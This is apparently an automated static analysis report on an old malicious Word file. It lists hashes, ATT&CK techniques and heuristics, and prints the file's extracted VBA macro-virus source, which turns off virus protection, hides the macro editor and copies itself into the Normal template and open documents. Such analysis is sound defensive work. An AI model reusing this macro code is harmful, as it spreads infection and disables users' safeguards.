Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e67f660d6a51828…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 266.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 280c7d69181192507efc837ce55b10e0
SHA-1: 6ea6b630d1a9babb5123bd717c93b5c7afcee05e
SHA-256: 7e67f660d6a51828c4cf99d9ae7cc546c9df7cfc18ddcafda74b0579944ff6ab
Risk score: 320

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection (Doc.Trojan.Chack-1) and the presence of embedded OLE objects further indicate malicious intent. The VBA macro's purpose appears to be downloading and executing a secondary payload, as suggested by the heuristic firings and the nature of the macro code.

Heuristics (7)

  • ClamAV: Doc.Trojan.Chack-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chack-1
  • Embedded Office document has suspicious static findings [critical] EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 232,931 bytes but its declared streams total only 0 bytes — 232,931 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected [medium; 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • CFB header with no readable streams [medium] OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18,892 bytes
SHA-256: 926faff4aa012490ff2c762e8892288ab281e9a781381d4eaf010ceacd673c25
Detection: ClamAV: Doc.Trojan.Chack-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Superjc"
' Macros By JC'S Hacker
' This is the beautiful thing you also learn at the University, apart from the mechanical part
' JTBH anywhere that you are, you should remember me, uniquely I wish them that all the world Knew that I him Love, and that nothing will do forget her
' and live those that wonderful thet is the love, but never you will find to nothing like as me
' I was your married, of that you never will forget.
' With great pride THE-EPN-SNF-XX-CB from some corner of the planet, for the whole world
' Felicidades or Happyness Datafellows, I hope that you can kill this bug early before infect so much machines Good Luck

Public Inicial
Public Salva
Public Infecta
Public Infdocum
Sub JCstart()
    Inicial = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Inhab
    WordBasic.DisableAutoMacros 0
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    On Error GoTo 0
End Sub
Sub JCfinal()
    Application.DisplayAlerts = Inicial
End Sub
Sub VerinfNorm()
    Call Inhab
    On Error GoTo Step1
    Infecta = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Step2
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "Superjc" Then Infecta = True
      If (NMacr <> "Superjc") And (NMacr <> "SPJC") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, _
            Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Step2:
    If Infecta = False Then
      On Error GoTo Step3
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "Superjc", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "SPJC", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Step3:
    End If
Step1:
End Sub
Sub InfectNor()
    On Error GoTo Step4
    Salva = 0
    Infdocum = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Step5
    For i = 1 To AD.VBProject.VBComponents.Count
      NMacr = AD.VBProject.VBComponents(i).Name
      If NMacr = "Superjc" Then Infdocum = True
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "Superjc" Then Infdocum = True
      On Error GoTo Step5
      If (NMacr <> "Superjc") And (NMacr <> "SPJC") And _
        (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") And _
        (NMacr <> "ThisDocument") And (NMacr <> "Referencia a Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, _
          Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Step5:
    If Infdocum = False Then
      On Error GoTo Step6
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "Superjc", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "SPJC", Object:=wdOrganizerObjectProjectItems
      Salva = 1
Step6:
    End If
Step4:
End Sub
Sub SUPERJC()
    Call JCstart
    Call VerinfNorm
    Call JCfinal
End Sub
Sub Inhab()
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = Fals
... (truncated)
Filename | Kind | Source | Size
embedded_office_off00009a1d.ole | embedded-office | Embedded OLE/CFB Office body inside OLE container at offset 0x9A1D | 232,931 bytes
SHA-256: edbc79f90b13011c930f02c5d52d3e0126924ffb2e1509dbf86558a861085fbd
embedded_office_off0000a50d.ole | embedded-office | Embedded OLE/CFB Office body inside OLE container at offset 0xA50D | 230,131 bytes
SHA-256: 6794a295c09eb72ceeac0bcf01bc67363d29089f985ae8083dab8657bf361bdd